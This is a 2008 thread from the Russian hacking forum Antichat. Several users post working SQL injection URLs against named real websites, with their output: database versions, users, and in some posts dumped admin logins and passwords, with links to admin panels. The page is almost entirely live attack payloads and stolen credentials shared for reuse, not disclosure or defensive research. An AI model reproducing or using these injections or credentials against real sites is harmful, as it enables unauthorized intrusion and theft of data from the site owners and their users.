ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6981  
Старый 01.12.2008, 11:09
Аватар для bons
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

www.softstandart.com, тИЦ = 10

Код:
http://www.softstandart.com/feedback.php?id=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+0
http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+0
вторая инъекция - вывод всех записей

version() - 5.0.67-log
database() - softstandart
user() - james303@galaxie.dreamhost.com

здесь вероятно логин и хэш админа:
Код:
http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,concat(id,':',login,':',pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+user--+0
интуиция говорит мне что он быстро подбирается и подходит к админке: http://www.softstandart.com/admin
-----------------------------

www.bfpais.ru, тИЦ = 10

Код:
http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,concat(version(),0x3A,user(),0x3A,database()),5,6,7,8,9--
version() - 5.0.67
user() - bfpais@localhost
database() - bfpais


Код:
http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,4,5,6,concat(id,0x3A,nick,0x3A,passwd,0x3A,access),8,9+from+_user+limit+0,1--
как мне кажется, есть большая вероятность что здесь пароль вообще даже не хэширован и подходит к админке: http://www.bfpais.ru/admin
-----------------------------

www.infoliolib.info, тИЦ = 160

Код:
http://www.infoliolib.info/author.php?aid=-1+union+select+1,concat(version(),0x3A,user(),0x3A,database()),3--
version() - 5.0.51a-community
user() - infoli_user@localhost
database() - infoli_infolio
-----------------------------


www.studentam.by

Код:
http://www.studentam.by/index.php?m=6&cl=l&mn=1&id=-1+union+select+version(),database(),user()--
version() - 5.0.51a-6-log
database() - studentamby
user() - studentamby@localhost
 
Ответить с цитированием

  #6982  
Старый 01.12.2008, 17:53
Аватар для a.su.s
a.su.s
Познающий
Регистрация: 02.03.2008
Сообщений: 44
Провел на форуме:
366195

Репутация: 64
По умолчанию

Веб дизайн студия
http://www.archont.info/ PR=4

Код:
http://www.archont.info/albom.php?event=showimg&id_pic=-2+union+select+1,database() ,3,4,5,6,7,8,user(),10,11,12--
version() - 4.1.22-standard
user() - artper_newsite@localhost
database() - artper_newsite

Последний раз редактировалось a.su.s; 01.12.2008 в 17:57..
 
Ответить с цитированием

  #6983  
Старый 02.12.2008, 00:16
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://www.old-pr o.ru/catalog_item.php?id=-44+union+select+version()--&cat=

5.0.67-log

http://www.lev elpro68.ru/index.php?id=-31+union+select+1,2,3,unhex(hex(concat_ws(0x3a,log in,0x3a,password))),5,6,7,8+from+users--&PHPSESSID=769d439282f763586a8f8e25dddc402a

http://www.vis aro.ru/index.php?id=-31+union+select+1,2,3,4,5,unhex(hex(login)),7,8+fr om+users--&PHPSESSID=3ad8b5826f2f814541516c5f4a1af0e1

http://sanve k.ru/index.php?id=-45+union+select+1,2,3,4,concat_ws(0x3a,name,0x3a,l ogin,0x3a,password),6,7,8+from+wm_users--&type=C
Administrator:::admin:::2

http://deve lop.renet.ru/catsection.php?id=-19+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25--
4.1.22-log

Последний раз редактировалось plutus; 02.12.2008 в 01:24..
 
Ответить с цитированием

  #6984  
Старый 02.12.2008, 00:54
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.kawacolor.com.ar/detalle_tienda.php?id=-1+union+select+1,2,concat_ws(0x3a3a,email,pass,niv elPermiso),4,5,6,7,8+from+usuarios+limit+0,1/*

login:info@marcoscantori.com.ar
pass:admin

http://www.kawacolor.com.ar/admin


Аргентина плиять.. =)
 
Ответить с цитированием

  #6985  
Старый 02.12.2008, 15:25
Аватар для Delduvat
Delduvat
Новичок
Регистрация: 02.12.2008
Сообщений: 1
Провел на форуме:
4853

Репутация: 1
По умолчанию

http://www.old-pro.ru/news.php?id=-3+UNION+SELECT+pass,login,rand_id+from+u47894_emai ka.shop_admin+limit+0,1--


version: 5.0.67-log
login: 131973
pass: eeemaika

http://www.old-pro.ru/news.php?id=-3+UNION+SELECT+login,pass,mail+from+u47894.setting s+limit+0,1--
login: admin
pass: abidqlyv

В админку http://www.old-pro.ru/admin/ почему-то не заходит...

Последний раз редактировалось Delduvat; 02.12.2008 в 15:40..
 
Ответить с цитированием

  #6986  
Старый 02.12.2008, 21:33
Аватар для a.su.s
a.su.s
Познающий
Регистрация: 02.03.2008
Сообщений: 44
Провел на форуме:
366195

Репутация: 64
По умолчанию

PR=7 тИЦ=1300
http://www.popmech.ru/

Код:
http://www.popmech.ru/part/?articleid=-1+union+select+user()--
version() - 4.0.26
user() - popmech@www.popmech.ru
 
Ответить с цитированием

  #6987  
Старый 03.12.2008, 01:28
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://abiturient.ed u.uz/index.php?o=info&op=tush&id=-153+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14--

5.1.15-beta-log

http://www.castin g.uz/anketa.php?id=-169+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,version(),17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48--

4.1.14-standard

http://www.pharm a.uz/poleznoe.php?id=-1+union+select+1,concat(user,0x3a,pass),3,4,5+from +userlist--

version 5

http://music.bishke k.kg/cgi-bin/mzinfo.cgi?id=-604+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13,14--

4.1.19-log

http://www.summersch ool.manas.kg/index.php?id=-31+union+select+1,2,unhex(hex(version())),4--

4.1.10

http://www.jo blist.tj/showvacancy.php?id=-1257+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23--

4.1.22-standard-log

Последний раз редактировалось plutus; 03.12.2008 в 02:28..
 
Ответить с цитированием

  #6988  
Старый 03.12.2008, 02:03
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://www.trianglearts.org/batiscafo/proceso.php?id=-19+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,user(),14/*

Database Version:4.0.20a-nt
User name:batiscafo@localhost
Database name: trianglearts_batiscafo

http://www.wopl.org/tips-detail.php?id=-3+union+select+1,2,version()/*

Database Version: 5.0.45
Database name: wopl
User name: remote@localhost

http://www.telespeak.co.uk/course-detail.php?id=-3+union+select+1,version(),user(),4,5--

version() 5.0.51a-log
user() dbo250573002@212.227.127.176
database() db250573002

http://www.fatsalesman.com/detail.php?propertyid=3+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28--&listingtype=boat

Database Version: 5.0.15-nt
Database name: fat
User name: ot@serv

http://ukbusinessbroadband.co.uk/detail.php?name=pipex_PRO&id=3+union+select+1,vers ion(),user(),4,5,6,7,8,9,10,11,database(),13,14,15 ,16,17,18,19,20,21,22,23/*

Database Version:4.1.22-standard
User name ipquant_pipquan@localhost
Database nameipquant_pipex

http://klinika.vetdoctor.ru/right_column.detail.php?id=-3+union+select+version(),2/*

Database Version:5.0.22
Database name:u00088_klinika
User name :u00088_klinika'@'localhost
 
Ответить с цитированием

  #6989  
Старый 03.12.2008, 02:47
Аватар для plutus
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://www.atlantisstorm.com/popupproduct.php?ID=-3+union+select+1,2,version(),4,5--
5.0.67-community
 
Ответить с цитированием

  #6990  
Старый 03.12.2008, 10:32
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

http://honors.uoregon.edu/faculty/profiles/index.php?id=5+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,table_name,18+from+INFORMATION_SC HEMA.TABLES--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ